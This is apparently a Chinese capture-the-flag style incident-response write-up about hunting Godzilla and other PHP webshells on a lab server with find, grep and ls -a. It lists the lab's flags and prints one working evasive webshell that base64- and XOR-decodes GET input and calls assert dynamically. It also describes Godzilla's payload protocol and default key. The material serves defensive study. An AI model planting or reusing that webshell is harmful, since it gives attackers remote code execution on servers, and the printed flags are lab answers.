玄机应急响应第一章 应急响应-webshell的查杀

20240430082633370-图片

连接上靶机过后 直接查看日志

cd /var/log

20240430082740667-图片

发现是通过apache搭建的web服务

也可查看外联和端口开开放情况

netstat -pantu

20240430082830516-图片

这里也可以确定开启了apache服务 也确实为apache + php

接下来查看木马文件

一个一个文件看不现实 直接使用find命令去匹配shell字段中可能存在的敏感字段去查找webshell

find ./ -name "*.php" |xargs grep "eval("

20240430082923121-图片

查找到三个文件

下面来看第一个./include/gz.php

20240430082954522-图片

发现第一个隐藏的flag flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

 

其实这个一眼可以看出来是哥斯拉

哥斯拉php马特征

  • session_start() 创建或者重启一个会话

  • @set_time_limit(0) 设置程序最长运行时间 永远

  • @error_reporting(0) 关闭错误报告

  • $key=xxxxxxxxx 加解密的盐值

哥斯拉php马的利用逻辑:

第一次通信时,服务端通过POST方式传递一个名叫pass的参数给木马,给pass参数赋的值是加密后的一组用”|”隔开的方法,也就是接下来要使用的攻击荷载。荷载在解密后被存入SESSION,供之后使用。

从第二次通信开始,pass传入的是远控命令,通过攻击荷载中的run()方法执行远控命令。然后对回显进行加密后传输给哥斯拉的服务端。

所以第二个flag就是Godzilla的github地址的md5值

https://github.com/BeichenDream/Godzilla

Flag2: flag{39392DE3218C333F794BEFEF07AC9257}

接着来看找到的第二个shell ./include/Db/.Mysqli.php

当我们进入目标文件夹时,用ls显示文件看到的只是正常的数据库配置文件

20240430083246816-图片

该webshell通过以 ‘.’ 开头对shell命名,得到的文件就是隐藏文件,这时得使用

ls -a

20240430083323142-图片

20240430083350846-图片

典型的哥斯拉马子特征

所以第三个flag 为该shell的地址:/var/www/html/include/Db/.Mysqli.php

Flag3: flag{AEBAC0E58CD6C5FAD1695EE4D1AC1919}

第三个所发现的shell就是来混淆我们的一句话木马

这时还差一个免杀马没有找到

php免杀马通常字符串异或加密、base家族加密、rot13加密 字符串拼接等方式实现

这里尝试最常见的base64编码,同样也是通过find去匹配关键字查询

find ./ -name "*.php" | xargs grep "base64_decode"

20240430083607184-图片

20240430083628948-图片

<?php  $key = "password";
//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){
$fun[$i] = $fun[$i]^$key[$i+1&7]; }
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);

该免杀马首先使用base64对于接收到的func参数进行加密,以绕过黑名单检查,再使用key对加密的内容进行异或加密,然后通过$a.$s.$_GET[“func2”] 拼接的方式来动态调用,绕过静态检验。

所以第三个flag 为该shell的地址:/var/www/html/wap/top.php

Flag4: flag{EEFF2EABFD9B7A6D26FC1A53D3F7D1DE}

总结

哥斯拉php马的特征:

  1. webshell配置,常见于文件头session_start(); @set_time_limit(0); @error_reporting(0);

  2. 默认的加解密盐值:3c6e0b8a9c15224a

  3. 有一个向SESSION中存储攻击荷载的过程,就是会有一个$_SESSION[$XXX]=P的过程

 

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞21 分享
评论 共19条

请登录后发表评论

    • 头像seo services0
    • 头像internation seo company0
    • 头像Timmothy Emmerich0
    • 头像elektriker gesundbrunnen0
    • 头像teppichreinigung München0
    • 头像elektriker gesundbrunnen0
    • 头像teppichreinigung münchen0
    • 头像Daftar Rajaspin0
    • 头像Kian Hand0
    • 头像Elody Luettgen0
    • 头像Ivy Mante0
    • 头像Lawrence Smith0
    • 头像Dayne Lynch0
    • 头像Wilhelm Murray0
    • 头像Amos Hauck0
    • 头像Domenico Medhurst0
    • 头像Joel Stamm0
    • 头像Kay Torphy0